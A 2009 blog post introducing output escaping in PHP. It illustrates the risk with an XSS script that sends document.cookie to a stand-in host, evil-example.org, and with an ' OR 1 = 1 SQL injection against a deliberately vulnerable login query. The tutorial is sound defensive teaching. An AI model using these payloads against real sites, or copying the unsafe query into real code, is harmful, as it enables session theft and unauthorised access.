Just another WordPress weblog
RSS icon Email icon Home icon
  • ESCAPE OUTPUT Part 1

    Posted on March 28th, 2009 admin No comments

    Why Escape?

    So, you run a Web-based forum, and you don’t have a problem with users entering the occasional

    HTML tag. Why should you escape your output? Here’s why: Suppose this forum allows users to

    enter HTML tags. That’s fair enough—you may want to allow them to enter bold-faced or italicized text—but then it outputs everything in its raw form—everything. So, all HTML tags get interpreted by the web browser. What if a user enters the following?

    <script>

    location.href=’http://evil-example.org/stealcookies.

    php?cookies=’ + document.cookie;

    </script>

    Any subsequent user who is logged into the forum and visits this page will now be redirected to

    http://evil-example.org/steal-cookies.php and any cookies set by the forum can be stolen. Let’s look at another example. Many sites contain login forms, which usually consist of two fields—a

    username and a password. When a user enters a username and password, the application may enter the values into an SQL statement, as in the following:

    $sql = “SELECT * FROM users

    WHERE username = ‘{$_POST[‘username’]}’

    AND password = ‘{$_POST[‘password’]}’”;

    This statement will work just fine as long as a user enters a proper username and password, but suppose a user enters something like “example’ OR 1 = 1; –” as the username? The value of 1 will always equal 1, and since the user properly closed the single quote in the statement, the OR clause will be treated as part of the SQL, and everything after the — will be ignored (at least

    in most database engines) as a comment. Thus, the user is able to log in without an account.

    The first step to ensure situations such as these do not occur is to filter all input to ensure that no

    unexpected characters appear in the data.

    After filtering, be sure to save the raw data. Do not escape it before storing. If escaped before storing, then it might be necessary to unescape it at some point in the future. For

    example, what if the data is escaped for HTML output and stored to a database table only to be retrieved later to output in XML or to PDF, etc.? Then, it must be unescaped to transport to those formats—and possibly escaped again to accommodate the new output medium. This process is bound to introduce more bugs to your code and could likely reduce the quality of the data. Thus, to make the most of your data, it is best to save it raw (after filtering) and escape only when uputting. Escaping output is not a terribly difficult process. At the least, it may require the addition of a few extra lines of code, or it may require a little more attention to detail. The important thing to keep in mind is the format outputted and the special characters that need to be escaped for that format. For the purposes of this discussion, I will cover escaping for HTML and SQL, since PHP has excellent built-in functions for handling output

    to these formats.

    Leave a reply